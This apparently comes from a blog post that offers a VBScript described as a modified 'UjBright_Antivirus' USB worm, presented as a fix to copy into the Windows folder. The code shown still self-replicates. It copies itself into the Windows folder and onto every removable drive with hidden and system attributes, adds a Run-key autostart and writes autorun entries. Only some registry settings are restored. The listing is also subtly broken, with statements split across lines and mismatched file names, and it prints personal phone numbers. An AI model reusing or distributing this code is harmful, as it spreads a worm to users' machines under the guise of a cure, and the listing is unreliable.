The file UjBright_Antivirus.vbs infects the systems and changes Explorer>Menu>Tools>Folder options> and changes the file attributes to NOT show hidden files, It also disables registry editing, so that we cannot disable the virus from being active.
I changed the file Uj UjBright_Antivirus.vbs;
I changed the registry enteries to enable whatever this file was disabling and i added for it to end the viral script.
This file u copy to /systemroot/windows/ folder. It will run once and then stop. No infections alas it clears the changes made by the virus.
===================
On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax
Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")
win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)
If Mid(x, 4) = "UjBright_Antivirus_vbs.txt" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If
Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop
ax = fso.FileExists(win & "\UjBright_Antivirus_vbs.txt")
Set myFile = fso.CreateTextFile(win &
"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(win & "\UjBright_Antivirus_vbs.txt")
fAttr.Attributes=39
wscr.RegWrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
autoMe", " """ & win & "\UjBright_Antivirus_vbs.txt"""
If ax = false Then wscr.Run "wscript.exe """ & win &
"\UjBright_Antivirus_vbs.txt"""
While (true)
Set myDrives = fso.Drives
For Each myFlashDrive In myDrives
If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:"
Then
If fso.FileExists(myFlashDrive.Path & "\Autorun.inf")
Then
Set fAttr = fso.Getfile(myFlashDrive.Path &
"\Autorun_inf.txt")
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & "\Autorun_inf.txt",
true
End If
Set auFile = fso.CreateTextFile(myFlashDrive.Path &
"\Autorun_inf.txt", true)
auFile.write "[autorun]" & vbCrLf & "open=\" & vbCrLf &
"open=wscript.exe UjBright_Antivirus_vbs.txt" & vbCrLf &
"shell\Open\Command=wscript.exe UjBright_Antivirus_vbs.txt" &
vbCrLf & "shell\Open\Default=1"
auFile.close
Set auFile = fso.CreateTextFile(myFlashDrive.Path &
"\README_MIT_.txt", true)
auFile.write "Hello FRIENDS:" & vbCrLf & "" & vbCrLf & ""
& vbCrLf & "" & vbCrLf & " " & vbCrLf & "modified to negate virus
infection by DR.MHMD IMRAN T., +919441119044 Hyderabad, India" &
vbCrLf & " " & vbCrLf & "PARA SA GUSTONG MAGPA-ADVERTISE:" &
vbCrLf & "He wrote the virus >>> JUST CONTACT ME: 09083223171 -
UJBRIGHT"
auFile.close
Set fAttr = fso.Getfile(myFlashDrive.Path &
"\Autorun_inf.txt")
fAttr.Attributes=39
Set myFile = fso.CreateTextFile(myFlashDrive.Path &
"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(myFlashDrive.Path &
"\UjBright_Antivirus_vbs.txt")
fAttr.Attributes=39
End If
Next
With wscr
.RegWrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
autoMe", " """ & win & "\UjBright_Antivirus.txt"""
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo
rer\Advanced\Hidden", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo
rer\Advanced\HideFileExt", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo
rer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
ies\Explorer\NoFolderOptions", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
ies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
ies\System\DisableRegistryTools", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
ies\System\DisableTaskMgr", 0, "REG_DWORD"
End With
If tf <> win & "\UjBright_Antivirus.txt" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If
WScript.Sleep 10000
WScript.Quit
Wend
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment